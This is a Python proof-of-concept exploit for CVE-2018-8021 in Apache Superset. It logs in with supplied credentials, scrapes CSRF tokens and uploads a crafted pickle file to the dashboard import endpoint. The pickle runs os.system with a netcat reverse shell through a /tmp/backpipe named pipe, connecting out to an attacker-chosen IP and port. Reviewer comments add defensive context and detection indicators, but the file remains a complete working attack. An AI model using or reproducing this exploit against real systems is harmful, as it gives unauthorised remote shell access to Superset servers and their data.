    CVE-2018-8021.py
    3.41 KB / 2021-07-04 19:32:24
        
    '''_____________________________________________________________________
    |[] SHELL                                                      |ROOT]|!"|
    |"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| 
    |CODED BY > R3DXPLOIT(JIMMY)                                          | |
    |EMAIL > [email protected]                                   | |
    |Original PoC by David May ([email protected])               | |
    |_____________________________________________________________________|/|
    '''
    
    import sys
    import os
    from lxml import html
    import requests
    import argparse
    
    # Fixed browser-like request headers. main() assigns a local variable with
    # the same name and contents, so this module-level copy is not read there.
    # The constant Firefox 58 User-Agent is a stable string to match on in
    # web-server or proxy logs.
    headers_dict = dict([
        ('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0'),
        ('DNT', '1'),
        ('Connection', 'close'),
        ('Upgrade-Insecure-Requests', '1'),
    ])
    
    def main() : 
    	"""Proof-of-concept client for CVE-2018-8021 (per the file name).

    	Flow, as written below:
    	  1. Parse six required command-line options.
    	  2. Write a text pickle named ``<ip>_<port>.pickle`` into the current
    	     directory, deleting any earlier file of that name first.
    	  3. GET the login page, read the ``csrf_token`` input and POST the
    	     supplied credentials.
    	  4. GET ``/superset/import_dashboards``, read its ``csrf_token`` and
    	     POST the pickle file as a multipart upload.
    	  5. Close the session and exit.

    	Reviewer / defender notes:
    	  * The weakness exercised is the import endpoint deserialising an
    	    uploaded file with pickle (the behaviour the CVE describes). A
    	    pickle stream can name any importable callable and its arguments,
    	    so loading one is equivalent to running code; user-supplied files
    	    must be parsed with a data-only format instead.
    	  * Per the option help text, the account needs the "can Import
    	    Dashboards on Superset" privilege. Limiting who holds that
    	    permission narrows exposure until the service is upgraded.
    	  * Artefacts visible in this code that are useful for detection: the
    	    constant Firefox 58 User-Agent, a POST to
    	    ``/superset/import_dashboards`` carrying an
    	    ``application/octet-stream`` part whose file name ends in
    	    ``.pickle``, and, on a host that loads the file, a named pipe at
    	    ``/tmp/backpipe`` together with ``/bin/sh`` and ``nc`` child
    	    processes of the web application.
    	  * The responses of both POST requests are never inspected, so the
    	    script itself gives no indication of whether anything succeeded.
    	"""
    	parser = argparse.ArgumentParser()
    	parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True )
    	parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True)
    	parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True)
    	parser.add_argument('-p', '--port', help='port', dest='port', required = True)
    	parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True)
    	parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True)
    	args = parser.parse_args()
    	
    	# Script arguments
    	# NOTE(review): self-assignment, has no effect.
    	args.port = args.port
    	# Verify these URLs match your environment
    	# Both URLs use plain http and are built from args.tcp / args.tport.
    	login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/'
    	upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards'
    	# Remove a leftover payload file from a previous run, if present.
    	if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'):
    		os.remove(str(args.ip)+'_'+str(args.port)+'.pickle')
    	# Local dict; shadows the module-level headers_dict with the same contents.
    	headers_dict = {
    		'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
    		'DNT': '1',
    		'Connection': 'close',
    		'Upgrade-Insecure-Requests': '1',
    	}
    	# Hand-written text pickle: when loaded it calls os.system with the
    	# shell string below. This is why a .pickle file from an untrusted
    	# source has to be treated as executable code, never as data.
    	# args.ip / args.port are concatenated into that string unvalidated.
    	evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+')
    	evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + args.ip + ' ' + args.port + ' 1>/tmp/backpipe\'\ntR.')
    	evilPickle.close()
    	try : 
    		session = requests.session()	
    		login_page = session.get(login_URL)
    		# Only reports the status; execution continues either way.
    		if login_page.status_code != 200:
    			print('Login page not reached')
    		# Read the csrf_token input's value attribute from the login form.
    		login_tree = html.fromstring(login_page.content)
    		token = login_tree.xpath('//input[@id="csrf_token"]/@value')
    		
    		login_data = {
    			'token' : token,
    			'username' : args.user,
    			'password' : args.passw,
    		}
    		headers_dict['Referer'] = login_URL
    		# The response object is stored but never checked.
    		login = session.post(login_URL, headers=headers_dict, data=login_data)	
    		upload_page = session.get(upload_URL)
    		# Only reports the status; execution continues either way.
    		if upload_page.status_code != 200:
    			print('Upload page not reached')
    		upload_tree = html.fromstring(upload_page.content)
    		token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
    		headers_dict['Referer'] = upload_URL
    		# Multipart upload of the file written above. The handle opened
    		# inline here is never closed explicitly, and the response is
    		# stored but never checked.
    		upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
    		session.close()
    		# SystemExit does not derive from Exception, so neither handler
    		# below intercepts this exit.
    		sys.exit()
    	except requests.exceptions.ConnectionError : 
    		print('Connection Refused, Check The IP and PORT!!!')
    	# Catch-all: prints the error and lets main() return normally.
    	except Exception as e: 
    		print('Error :\n\n' , e)
    		
    	
    # Run main() only when the file is executed as a script, not on import.
    if __name__ == "__main__" : 
    	main()
    
    